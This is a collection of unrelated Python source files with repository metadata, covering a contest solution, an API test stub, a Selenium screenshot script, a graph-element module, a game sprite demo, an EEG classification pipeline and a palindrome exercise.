4125a3a6906417841daee6699df1daa262068870 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03069/s036551857.py | 273e2d32d2871800eb6b588af947e2fe9c71f0b3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import sys,math,collections,itertools
input = sys.stdin.readline
N = int(input())
s = input().rstrip()
cntb =0
cntw = s.count('.')
ans =cntw
for i in range(len(s)):
if s[i] == '#':
cntb +=1
else:
cntw -=1
ans = min(ans,cntb+cntw)
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e | 73e939e797cc28aa33a4f55c234237c47167033e | /test/test_transaction_summary.py | b5bc1ae60e987c82adcad1bf24cbb8c6ef351245 | [] | no_license | dmlerner/ynab-api | b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046 | df94b620d9ec626eacb9ce23bfd313f1c589b03a | refs/heads/master | 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 | Python | UTF-8 | Python | false | false | 975 | py | """
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
class TestTransactionSummary(unittest.TestCase):
"""TransactionSummary unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTransactionSummary(self):
"""Test TransactionSummary"""
# FIXME: construct object with mandatory attributes with example values
# model = TransactionSummary() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"dmlerner@gmail.com"
] | dmlerner@gmail.com |
01ef9cb216b469f0fd9d4d1c37cac3dcd6c36be7 | 75536622efb5b10f0d489e0733d2810a0225f679 | /scripts/sample.py | 471d6de48ae280b1f67a5f6175513ec592b96bce | [] | no_license | 6br/panacea | a08123a8c241a1b683624e8d91495d4389826831 | 3b336e1f34ae4aa84f29ac95d06cae1567bc1055 | refs/heads/master | 2022-12-05T09:53:10.848942 | 2020-09-03T06:16:30 | 2020-09-03T06:16:30 | 212,508,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | import os
import sys
import time
import datetime
from concurrent.futures import ThreadPoolExecutor
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
condition = {
"image/fig3a.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4a",
"image/fig3b.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4b",
"image/fig3c.png": "http://user:pass@0.0.0.0:8080/?preset=Fig4c",
"image/fig2.png": "http://user:pass@0.0.0.0:8080/?preset=Default"
}
timelapse = {
"image/fig1_4/": "http://user:pass@0.0.0.0:8080/?preset=Fig1",
"image/fig5/": "http://user:pass@0.0.0.0:8080/?preset=Fig5",
"image/fig6/": "http://user:pass@0.0.0.0:8080/?preset=Fig6"
}
DIR=os.path.join(os.path.dirname(os.path.abspath(__file__)), datetime.datetime.now().strftime('%Y%m%d-%H%M%S'))
if not os.path.exists(DIR):
os.mkdir(DIR)
if not os.path.exists(DIR + "/image"):
os.mkdir(DIR+"/image")
def save_png(driver, file, url, isMultiple):
# set driver and url
# https://qiita.com/hujuu/items/ef89c34fca955cc571ec
driver.get(url)
#time.sleep(5)
# get width and height of the page
w = driver.execute_script("return document.body.scrollWidth;")
h = driver.execute_script("return document.body.scrollHeight;")
# set window size
driver.set_window_size(w,h)
time.sleep(2)
element = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CLASS_NAME, 'contentsLoaded')))
# Get Screen Shot
# File Name
if isMultiple:
if not os.path.exists(os.path.join(DIR, file)):
os.mkdir(os.path.join(DIR, file))
for i in range(0, 40):
FILENAME = os.path.join(DIR, file + str(i) + ".png")
driver.save_screenshot(FILENAME)
time.sleep(0.75)
else:
time.sleep(12)
FILENAME = os.path.join(DIR, file)
driver.save_screenshot(FILENAME)
def driverfunc(k, v, arg):
options = Options()
#options.add_argument('--headless')
driver = webdriver.Chrome(options=options, executable_path='/usr/local/bin/chromedriver')
driver.maximize_window()
#driver.set_window_size(1920, 1280) # Full hd
driver.set_page_load_timeout(20)
save_png(driver, k, v, arg)
driver.quit()
executor = ThreadPoolExecutor(max_workers=2)
for (k, v) in condition.items():
#save_png(driver, k, v, False)
driverfunc(k, v, False)
#executor.submit(driverfunc, k, v, False)
for (k, v) in timelapse.items():
#save_png(driver, k, v, True)
driverfunc(k, v, True)
#executor.submit(driverfunc, k, v, True)
# Close Web Browser
#driver.quit()
# 並列実行するexecutorを用意する。
# max_workers が最大の並列実行数
#for t in testcase:
# executor.submit(driverfunc,t) | [
"tfdvrt@gmail.com"
] | tfdvrt@gmail.com |
8b9a1d2c684d7a07e09c72b4df3f6954ff8d244a | c06a2fa5bc47a4801d70617e9519a19f7df8789e | /fbml/element.py | 849d2b0c899b4ae67fd896c03ad3de9f092ea22b | [] | no_license | kalhauge/fbml-old | bc29317a605e7aa5a64ffc88d8996273284cbb5f | 2211270a21535370838fc40c6e5db6f5f08c2e50 | refs/heads/master | 2020-05-18T10:12:26.073990 | 2013-09-04T19:08:09 | 2013-09-04T19:08:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,430 | py | """
.. currentmodule:: fbml.element
.. moduleauthor:: Christian Gram Kalhauge
"""
import pprint
from collections import namedtuple, deque
import logging
log = logging.getLogger(__name__)
from fbml.util import Immutable, namedtuple_from_dict
from operator import attrgetter
From = namedtuple('From', ['function', 'slot'])
class Element(Immutable):
pass
class Sink (Element):
def __init__ (self, target, data):
Immutable.__init__(**locals())
@classmethod
def new(cls, target, data={}):
return cls(target, namedtuple_from_dict("SinkData", data))
@property
def owner(self):
return self.target.function
@property
def slot(self):
return self.target.slot
def depth(self, helper):
if not self in helper:
helper[self] = self.owner.depth(helper) + 1
return helper[self]
def __str__(self):
return 'Sink : {self.data.id!r} at \n{self.owner!s}'.format(**locals())
def update_data(self, function, data={}):
new_data = dict(vars(self.data))
new_data.update(data)
return self.new(From(function,self.slot),new_data)
class Internal(Sink): pass
class Source(Sink):
def __init__(self, slot, data):
Immutable.__init__(**locals())
@classmethod
def new(cls, slot, data={}):
return cls(
slot = slot,
data = namedtuple_from_dict("SourceData", data)
)
@property
def owner(self):
return None
@property
def slot(self):
return self.__dict__['slot']
def depth(self, helper):
return 0
def __str__(self):
return 'Source : {self.data.id!r} at {self.slot!r}'.format(**locals())
def update_data(self, data={}):
new_data = dict(vars(self.data))
new_data.update(data)
return self.new(self.slot,new_data)
class Constant(Sink):
def __init__(self, data):
Immutable.__init__(**locals())
@classmethod
def new(cls, data={}):
return cls(
data = namedtuple_from_dict("ConstantData", data)
)
@property
def owner(self):
return None
def depth(self, helper):
return 0
def __str__(self):
return 'Constant : {self.data.id!r}'.format(**locals())
def update_data(self, data={}):
new_data = dict(vars(self.data))
new_data.update(data)
return self.new(new_data)
class Target(Sink): pass
class Function (Element):
def __init__(self, sources, data):
Immutable.__init__(**locals())
@classmethod
def new(cls, sources, data={}):
return cls(
sources = namedtuple_from_dict("Sources", sources),
data = namedtuple_from_dict("FunctionData", data)
)
def depth(self,helper):
if not self in helper:
if not self.sources: depth = 0;
else: depth = max(sink.depth(helper)
for sink in self.sources) +1
helper[self] = depth;
return helper[self]
def __str__(self):
return 'Function'
def update_data(self, sink_data, data={}):
new_data = dict(vars(self.data).items())
new_data.update(data)
new_sinks = {slot: sink_data[sink] for slot, sink in vars(self.sources).items()}
return Function.new(new_sinks, new_data)
def __repr__(self):
return "<FUNCTION " + str(id(self)) + ">"
def _get_sinks_of_type(sink_type):
def get_sinks(self):
return ( sink for sink in self.sinks if isinstance(sink, sink_type) )
return get_sinks
class Impl (Immutable):
def __init__ (self, targets, sinks, functions):
Immutable.__init__(**locals())
@classmethod
def new(cls, target_sinks):
target_sinks = namedtuple_from_dict('Targets',target_sinks)
sinks, functions = Impl._calculate_reach(target_sinks)
return cls(
targets = target_sinks,
sinks = sinks,
functions = functions)
@staticmethod
def _calculate_reach(target_sinks):
#import pdb; pdb.set_trace()
sinks = set()
functions = set()
calc_sinks = deque(target_sinks)
while calc_sinks:
sink = calc_sinks.popleft()
if sink in sinks: continue
sinks.add(sink)
function = sink.owner
if function:
if function in functions: continue
functions.add(function)
calc_sinks.extend(function.sources)
return frozenset(sinks), frozenset(functions)
def functions_with_targets(self, functions):
targets = {}
for sink in self.sinks:
if sink.owner:
targets.setdefault(sink.owner,set()).add((sink.target.slot, sink))
return ((function, targets[function]) for function in functions)
constant_sinks = property(_get_sinks_of_type(Constant))
internal_sinks = property(_get_sinks_of_type(Internal))
source_sinks = property(_get_sinks_of_type(Source))
target_sinks = property(attrgetter('targets'))
def update_data(self, sink_data):
new_sinks = {slot: sink_data[sink]
for slot, sink in vars(self.targets).items()}
return Impl.new(new_sinks)
def __repr__(self):
return "<IMPL " + str(id(self)) + ">"
| [
"christian@kalhauge.dk"
] | christian@kalhauge.dk |
14249c6ddfac1936e3eae837ec0c193148ba9a71 | 2cbe3c441daf456ce38b97bb5cb6479d91d9f72b | /tutorial4.py | b3627758bac679e12a9e0ae1c122f3b17610422d | [
"MIT"
] | permissive | kingmayonaise/empty-app | f336ac5b23512278a0c9a0c18f43d106d6ac0b07 | af6f084ea292e62d7ec2e865738c916d0407fedb | refs/heads/master | 2021-01-18T05:02:53.594421 | 2016-11-17T01:38:46 | 2016-11-17T01:38:46 | 67,625,882 | 0 | 0 | null | 2016-09-07T16:45:35 | 2016-09-07T16:45:35 | null | UTF-8 | Python | false | false | 824 | py | from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
class SpaceShip(Sprite):
"""
Animated space ship
"""
asset = ImageAsset("images/four_spaceship_by_albertov_with_thrust.png",
Frame(227,0,292-227,125), 4, 'vertical')
def __init__(self, position):
super().__init__(SpaceShip.asset, position)
class SpaceGame(App):
"""
Tutorial4 space game example.
"""
def __init__(self, width, height,):
super().__init__(width, height)
black = Color(0, 1)
noline = LineStyle(0, black)
bg_asset = RectangleAsset(SCREEN_WIDTH, SCREEN_HEIGHT, noline, black)
bg = Sprite(bg_asset, (0,0))
SpaceShip((100,100))
myapp = SpaceGame(SCREEN_WIDTH, SCREEN_HEIGHT)
myapp.run()
| [
"danielmelnikov@hanovernorwichschools.org"
] | danielmelnikov@hanovernorwichschools.org |
dd374ab7f5502aff595c11cccbb73827945a7707 | 97f0330bb5a2050adc81871693d062cb730d22f6 | /y3s1/DMD/HW10/dbms/index.py | 8ab881d90684217e68df094c3149e7a6a2a3708b | [] | no_license | ariser/Innopolis | 56d5ef62a031d3b67bad93175868fd24d305ff5b | 7f1159368f0b4cc66cea9f36b1c208ea40d362c1 | refs/heads/master | 2021-01-10T13:52:07.154146 | 2017-04-20T08:46:38 | 2017-04-20T08:46:38 | 44,034,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | from dbms.vendor.btree import BPlusTree
class Index(object):
__slots__ = ['btree']
def __init__(self):
self.btree = BPlusTree(2)
| [
"ariser@ariser.ru"
] | ariser@ariser.ru |
08a1dfe046c907ca12715962c37263dd701a1167 | ee358856cbb844db19c82a03698e728cb5f1cc40 | /random_parser.py | 9c5a304c45123c355c64387be06f8e6f1f985ed9 | [] | no_license | Ramaraja/python-snippets | 789c0bd91d9be96f935a2439c054afeb2dc41a1e | dc7706471a634273102877bc77a6097dd161a56f | refs/heads/master | 2023-05-31T03:22:55.788556 | 2023-05-18T09:11:38 | 2023-05-18T09:11:38 | 102,446,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | # parser
data = """
NAME: "1", "DESCR": "C1000"
PID: EC1K-TEST , VID: V00 , SN: 193823648
OID: 1.2.3.4.5.6
NAME: "2", "DESCR": "C1000"
PID: EC1K-TEST , VID: V00 , SN: 193823648
OID: 1.2.3.4.5.6
"""
def oid_parser(data):
# assumed that the double newlines are seperate records
records = data.split('\n\n')
result = [] # to store the final result
for item in records:
# remove space, newline, tabs and flatterning
flat_val = item.strip(' \n\t\"').replace("\n",",").replace('"', '')
# still some spaces?? one more strip - Need to find a better way to do this.
rec = [x.strip() for x in flat_val.split(',')]
# convert to dict and store
result.append(dict(r.strip(' ').split(':') for r in rec))
return result
res = oid_parser(data)
print(res)
# test searching name and fetch oid
for item in res:
if str(item.get("NAME")).strip() == "1":
print(item.get("OID"))
| [
"noreply@github.com"
] | Ramaraja.noreply@github.com |
a8a168e45728b281c365ca8ea4ef5d5893de1049 | 57d2e77aa5e97c49d76a33a8a572eeabe82bc571 | /project/eeg_classification.py | 5f4dbca9e83af33fa1e5e1e9d678df80acf400f8 | [
"MIT"
] | permissive | boredStats/eeg-machine-learning | 167afd928d78df67db08ddfebeaf6e090a8aa250 | bbf72ef55644f3941120f8f9007d839c1a4731fd | refs/heads/master | 2022-10-03T19:58:03.901354 | 2019-12-10T18:11:58 | 2019-12-10T18:11:58 | 189,074,610 | 1 | 0 | MIT | 2022-09-30T18:46:42 | 2019-05-28T17:37:06 | Python | UTF-8 | Python | false | false | 17,994 | py | import numpy as np
import pandas as pd
import pickle as pkl
import proj_utils as pu
from os.path import isdir, join
from os import mkdir
from copy import deepcopy
from imblearn.over_sampling import RandomOverSampler, SMOTE
from imblearn.under_sampling import RandomUnderSampler
from sklearn import ensemble, feature_selection, model_selection, preprocessing, svm, metrics, neighbors
from sklearn.utils.testing import ignore_warnings
from sklearn.utils import shuffle
from sklearn.exceptions import ConvergenceWarning
seed = 13
def calc_scores(y_test, predicted):
balanced = metrics.balanced_accuracy_score(y_test, predicted)
chance = metrics.balanced_accuracy_score(y_test, predicted, adjusted=True)
f1 = metrics.f1_score(y_test, predicted, average=None)
return balanced, chance, f1
def save_scores(f1_scores, balanced_scores, chance_scores, class_labels):
# Calculate average performance and tack it onto the end of the score list, save to nice df
n_folds = len(balanced_scores)
f1_array = np.asarray(f1_scores)
if n_folds != f1_array.shape[0]:
raise ValueError("Number of folds does not match")
rownames = ['Fold %02d' % (n+1) for n in range(n_folds)]
rownames.append('Average')
f1_class_averages = np.mean(f1_array, axis=0)
f1_data = np.vstack((f1_array, f1_class_averages))
f1_df = pd.DataFrame(f1_data, index=rownames, columns=class_labels)
balanced_scores.append(np.mean(balanced_scores))
chance_scores.append(np.mean(chance_scores))
accuracy_data = np.asarray([balanced_scores, chance_scores]).T
score_df = pd.DataFrame(data=accuracy_data, index=rownames, columns=['Balanced accuracy', 'Chance accuracy'])
return f1_df, score_df
def svmc(x_train, y_train, x_test, cleaned_features):
clf = svm.LinearSVC(fit_intercept=False, random_state=seed)
clf.fit(x_train, y_train)
target_classes = clf.classes_
target_classes = [str(c) for c in target_classes]
predicted = clf.predict(x_test)
if len(target_classes) == 2:
idx_label = ['coefficients']
else:
idx_label = target_classes
coef_df = pd.DataFrame(clf.coef_, index=idx_label, columns=cleaned_features)
return predicted, coef_df, clf
def extra_trees(x_train, y_train, x_test, cleaned_features):
clf = ensemble.ExtraTreesClassifier(random_state=seed)
clf.fit(x_train, y_train)
predicted = clf.predict(x_test)
feature_df = pd.DataFrame(columns=cleaned_features)
feature_df.loc['feature_importances'] = clf.feature_importances_
return predicted, feature_df, clf
def knn(x_train, y_train, x_test):
clf = neighbors.KNeighborsClassifier()
clf.fit(x_train, y_train)
predicted = clf.predict(x_test)
return predicted, clf
def convert_hads_to_single_label(hads_array):
hads_array = hads_array.astype(int)
vartypes = ['anxiety', 'depression']
hads_single_label = []
for row in range(hads_array.shape[0]):
str_combos = []
for col in range(hads_array.shape[1]):
val = hads_array[row, col]
if val == 0:
str_convert = '%s_normal' % vartypes[col]
elif val == 1:
str_convert = '%s_borderline' % vartypes[col]
elif val == 2:
str_convert = '%s_abnormal' % vartypes[col]
str_combos.append(str_convert)
hads_combined = '%s-%s' % (str_combos[0], str_combos[1])
hads_single_label.append(hads_combined)
return hads_single_label
def feature_selection_with_covariates(x_train, x_test, y_train, continuous_indices, categorical_indices, feature_names):
# Split data for continuous, categorical preprocessing
x_train_cont, x_test_cont = x_train[:, continuous_indices], x_test[:, continuous_indices]
x_train_cat, x_test_cat = x_train[:, categorical_indices], x_test[:, categorical_indices]
# Standardization for continuous data
preproc = preprocessing.StandardScaler().fit(x_train_cont)
x_train_z = preproc.transform(x_train_cont)
x_test_z = preproc.transform(x_test_cont)
# Variance threshold for categorical data
varthresh = feature_selection.VarianceThreshold(threshold=0).fit(x_train_cat)
x_train_v = varthresh.transform(x_train_cat)
x_test_v = varthresh.transform(x_test_cat)
x_train_data = np.hstack((x_train_z, x_train_v))
x_test_data = np.hstack((x_test_z, x_test_v))
# Feature selection with extra trees
extra_tree_fs = ensemble.ExtraTreesClassifier(random_state=seed)
feature_model = feature_selection.SelectFromModel(extra_tree_fs, threshold="2*mean")
# Transform train and test data with feature selection model
x_train_feature_selected = feature_model.fit_transform(x_train_data, y_train)
x_test_feature_selected = feature_model.transform(x_test_data)
feature_indices = feature_model.get_support(indices=True)
cleaned_features = [feature_names[i] for i in feature_indices]
return x_train_feature_selected, x_test_feature_selected, cleaned_features
def feature_selection_without_covariates(x_train, x_test, y_train, feature_names):
# Standardization for continuous data
preproc = preprocessing.StandardScaler().fit(x_train)
x_train_z = preproc.transform(x_train)
x_test_z = preproc.transform(x_test)
# Feature selection with extra trees
extra_tree_fs = ensemble.ExtraTreesClassifier(random_state=seed)
feature_model = feature_selection.SelectFromModel(extra_tree_fs, threshold="2*mean")
# Transform train and test data with feature selection model
x_train_feature_selected = feature_model.fit_transform(x_train_z, y_train)
x_test_feature_selected = feature_model.transform(x_test_z)
feature_indices = feature_model.get_support(indices=True)
cleaned_features = [feature_names[i] for i in feature_indices]
return x_train_feature_selected, x_test_feature_selected, cleaned_features
@ignore_warnings(category=ConvergenceWarning)
def eeg_classify(eeg_data, target_data, target_type, model, outdir=None, resample='SMOTE'):
feature_names = list(eeg_data)
if "categorical_sex_male" in feature_names:
cv_check = 'with_covariates'
else:
cv_check = 'without_covariates'
if resample is 'no_resample':
class NoResample: # for convenience
@staticmethod
def fit_resample(a, b):
return a.values, np.asarray(b)
resampler = NoResample()
elif resample is 'ROS':
resampler = RandomOverSampler(sampling_strategy='not majority', random_state=seed)
elif resample is 'SMOTE':
resampler = SMOTE(sampling_strategy='not majority', random_state=seed)
elif resample is 'RUS':
resampler = RandomUnderSampler(sampling_strategy='not minority', random_state=seed)
x_res, y_res = resampler.fit_resample(eeg_data, target_data)
if outdir is not None:
model_outdir = join(outdir, '%s %s %s %s' % (target_type, model, cv_check, resample))
if not isdir(model_outdir):
mkdir(model_outdir)
print('%s: Running classification - %s %s %s %s' % (pu.ctime(), target_type, model, cv_check, resample))
# Apply k-fold splitter
n_splits = 50
skf = model_selection.StratifiedKFold(n_splits=n_splits, random_state=seed)
skf.get_n_splits(x_res, y_res)
fold_count = 0
classifier_objects, classifier_coefficients, cm_dict, norm_cm_dict = {}, {}, {}, {}
balanced_acc, chance_acc, f1_scores = [], [], []
for train_idx, test_idx in skf.split(x_res, y_res):
fold_count += 1
print('%s: Running FOLD %d for %s' % (pu.ctime(), fold_count, target_type))
foldname = 'Fold %02d' % fold_count
# Stratified k-fold splitting
x_train, x_test = x_res[train_idx], x_res[test_idx]
y_train, y_test = y_res[train_idx], y_res[test_idx]
if "categorical_sex_male" in feature_names:
continuous_features = [f for f in feature_names if 'categorical' not in f]
continuous_indices = [eeg_data.columns.get_loc(cont) for cont in continuous_features]
categorical_features = [f for f in feature_names if 'categorical' in f]
categorical_indices = [eeg_data.columns.get_loc(cat) for cat in categorical_features]
x_train_fs, x_test_fs, cleaned_features = feature_selection_with_covariates(
x_train, x_test, y_train, continuous_indices, categorical_indices, feature_names)
else:
x_train_fs, x_test_fs, cleaned_features = feature_selection_without_covariates(
x_train, x_test, y_train, feature_names)
if model is 'svm':
predicted, coef_df, clf = svmc(x_train_fs, y_train, x_test_fs, cleaned_features)
classifier_coefficients[foldname] = coef_df
elif model is 'extra_trees':
predicted, feature_importances, clf = extra_trees(x_train_fs, y_train, x_test_fs, cleaned_features)
classifier_coefficients[foldname] = feature_importances
elif model is 'knn':
predicted, clf = knn(x_train_fs, y_train, x_test_fs)
classifier_objects[foldname] = clf
# Calculating fold performance scores
balanced, chance, f1 = calc_scores(y_test, predicted)
balanced_acc.append(balanced)
chance_acc.append(chance)
f1_scores.append(f1)
# Calculating fold confusion matrix
cm = metrics.confusion_matrix(y_test, predicted)
normalized_cm = cm.astype('float')/cm.sum(axis=1)[:, np.newaxis]
cm_dict[foldname] = pd.DataFrame(cm, index=clf.classes_, columns=clf.classes_)
norm_cm_dict[foldname] = pd.DataFrame(normalized_cm, index=clf.classes_, columns=clf.classes_)
# Saving performance scores
f1_df, score_df = save_scores(f1_scores, balanced_acc, chance_acc, class_labels=clf.classes_)
scores_dict = {'accuracy scores': score_df,
'f1 scores': f1_df}
try:
pu.save_xls(scores_dict, join(model_outdir, 'performance.xlsx'))
# Saving coefficients
if bool(classifier_coefficients):
pu.save_xls(classifier_coefficients, join(model_outdir, 'coefficients.xlsx'))
pu.save_xls(cm_dict, join(model_outdir, 'confusion_matrices.xlsx'))
pu.save_xls(norm_cm_dict, join(model_outdir, 'confusion_matrices_normalized.xlsx'))
# Saving classifier object
with open(join(model_outdir, 'classifier_object.pkl'), 'wb') as file:
pkl.dump(classifier_objects, file)
except Exception:
pass
return scores_dict
def side_classification_drop_asym(ml_data, behavior_data, output_dir, models=None):
print('%s: Running classification on tinnitus side, dropping asymmetrical subjects' % pu.ctime())
ml_copy = deepcopy(ml_data)
if models is None:
models = ['extra_trees']
resample_methods = [None, 'over', 'under']
t = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')
t_df = pd.DataFrame(t, index=ml_copy.index)
asym_indices = []
for asym in ['Right>Left', 'Left>Right']:
asym_indices.extend([i for i, s in enumerate(t) if asym == s])
asym_data = ml_copy.iloc[asym_indices]
ml_copy.drop(index=asym_data.index, inplace=True)
t_df.drop(index=asym_data.index, inplace=True)
target_cleaned = np.ravel(t_df.values)
for model in models:
for res in resample_methods:
eeg_classify(ml_copy, target_cleaned, 'tinnitus_side_no_asym', model, output_dir, resample=res)
# side_classification_drop_asym(ml_data, behavior_data, output_dir, models=models)
def type_classification_drop_mixed(ml_data, behavior_data, output_dir, models=None):
print('%s: Running classification on tinnitus type, dropping mixed type subjects' % pu.ctime())
ml_copy = deepcopy(ml_data)
if models is None:
models = ['extra_trees']
resample_methods = [None, 'over', 'under']
t = pu.convert_tin_to_str(behavior_data['tinnitus_type'].values.astype(float), 'tinnitus_type')
t_df = pd.DataFrame(t, index=ml_copy.index)
mixed_indices = [i for i, s in enumerate(t) if s == 'PT_and_NBN']
type_data = ml_copy.iloc[mixed_indices]
ml_copy.drop(index=type_data.index, inplace=True)
t_df.drop(index=type_data.index, inplace=True)
target_cleaned = np.ravel(t_df.values)
for model in models:
for res in resample_methods:
eeg_classify(ml_copy, target_cleaned, 'tinnitus_type_no_mixed', model, output_dir, resample=res)
# type_classification_drop_mixed(ml_data, behavior_data, output_dir, models=models)
def classification_main(covariates=True, n_iters=0):
output_dir = './../data/eeg_classification'
if not isdir(output_dir):
mkdir(output_dir)
print('%s: Loading data' % pu.ctime())
behavior_data, conn_data = pu.load_data_full_subjects()
ml_data_without_covariates = conn_data.astype(float)
categorical_variables = ['smoking', 'deanxit_antidepressants', 'rivotril_antianxiety', 'sex']
categorical_data = behavior_data[categorical_variables]
dummy_coded_categorical = pu.dummy_code_binary(categorical_data)
covariate_data = pd.concat([behavior_data['age'], dummy_coded_categorical], axis=1)
ml_data_with_covariates = pd.concat([conn_data, covariate_data], axis=1)
models = ['svm', 'extra_trees', 'knn']
resample_methods = ['no_resample', 'ROS', 'SMOTE', 'RUS']
targets = {}
side_data = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')
targets['tin_side'] = side_data
type_data = pu.convert_tin_to_str(behavior_data['tinnitus_type'].values.astype(float), 'tinnitus_type')
targets['tin_type'] = type_data
tq_data = behavior_data['distress_TQ'].values
high_low_thresholds = [0, 46, 84]
tq_high_low = np.digitize(tq_data, bins=high_low_thresholds, right=True)
targets['TQ_high_low'] = tq_high_low
grade_thresholds = [0, 30, 46, 59, 84]
binned_target = np.digitize(tq_data, bins=grade_thresholds, right=True)
tq_grade = ['Grade_%d' % t for t in binned_target]
targets['TQ_grade'] = tq_grade
# hads_thresholds = [8, 11, 21] # 0-7 (normal); 8-10 (borderline); 11-21 (abnormal)
# anx_binned = np.digitize(behavior_data['anxiety_score'].values.astype(float), bins=hads_thresholds, right=True)
# dep_binned = np.digitize(behavior_data['depression_score'].values.astype(float), bins=hads_thresholds, right=True)
# targets['hads_OVR'] = convert_hads_to_single_label(np.vstack((anx_binned, dep_binned)).T)
if covariates:
ml_data = ml_data_with_covariates
cv_check = 'with_covariates'
else:
ml_data = ml_data_without_covariates
cv_check = 'without_covariates'
if n_iters != 0:
for model in models:
for res in resample_methods:
for target in targets:
target_data = targets[target]
perm_scores = {}
model_outdir = join(output_dir, '%s %s %s %s' % (target, model, cv_check, res))
if not isdir(model_outdir):
mkdir(model_outdir)
for n in range(n_iters):
perm_target = shuffle(target_data)
scores = eeg_classify(
ml_data,
perm_target,
target_type=target,
model=model,
resample=res)
perm_scores['Iter%05d' % n] = scores
with open(join(model_outdir, 'perm_scores.pkl'), 'wb') as file:
pkl.dump(perm_scores, file)
else:
for target in targets:
target_data = targets[target]
for model in models:
for res in resample_methods:
eeg_classify(ml_data, target_data, target_type=target, model=model, outdir=output_dir, resample=res)
print('%s: Finished' % pu.ctime())
classification_main(covariates=True, n_iters=0)
classification_main(covariates=False, n_iters=0)
def test_gridsearch():
def gridsearch_pipe(cv=None):
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import SelectFromModel
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
kernel_range = ('linear', 'rbf') # , 'poly']
c_range = [1, 10, 100] # np.arange(start=1, stop=100, step=10, dtype=int)
# gamma_range = np.arange(.01, 1, .01)
param_grid = {'C': c_range} # , 'gamma': gamma_range} # , 'kernel': kernel_range}
pipe = Pipeline([
('preprocess_data', StandardScaler()),
('feature_selection', SelectFromModel(ExtraTreesClassifier(random_state=13), threshold="2*mean")),
('grid', GridSearchCV(SVC(kernel='rbf'), param_grid=param_grid, cv=cv, scoring='balanced_accuracy'))])
return pipe
print('%s: Loading data' % pu.ctime())
behavior_data, conn_data = pu.load_data_full_subjects()
ml_data_without_covariates = conn_data.astype(float)
side_data = pu.convert_tin_to_str(behavior_data['tinnitus_side'].values.astype(float), 'tinnitus_side')
resampler = SMOTE(sampling_strategy='not majority', random_state=seed)
x_res, y_res = resampler.fit_resample(ml_data_without_covariates, side_data)
n_splits = 10
skf = model_selection.StratifiedKFold(n_splits=n_splits, random_state=seed)
skf.get_n_splits(x_res, y_res)
pipe = gridsearch_pipe(cv=skf).fit(x_res, y_res)
gridsearch = pipe[-1]
best_params = gridsearch.best_params_
print(best_params)
best_score = gridsearch.best_score_
print(best_score)
print('%s: Finished' % pu.ctime())
test_gridsearch()
| [
"ian.abenes@gmail.com"
] | ian.abenes@gmail.com |
0fb0c324b7732ab490a71f2d069eca7673a43eb2 | 7a87119ef5d77a1b225aab45083a45dcd376684c | /6_palindroom.py | b71f3511d35f1b2ab48041d139ac45ce6325a707 | [] | no_license | astilleman/MI | 0e31e0f4098502e83a13805feae82e038c169bb7 | 1564fd28f759761c3e186d41107c9abff3b69070 | refs/heads/master | 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
result = True
if string == "":
exit()
if string[0] != string[-1]:
result = False
else:
result = is_palindroom(string[1:len(string)])
return result
# TESTS
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
| [
"43027764+astilleman@users.noreply.github.com"
] | 43027764+astilleman@users.noreply.github.com |
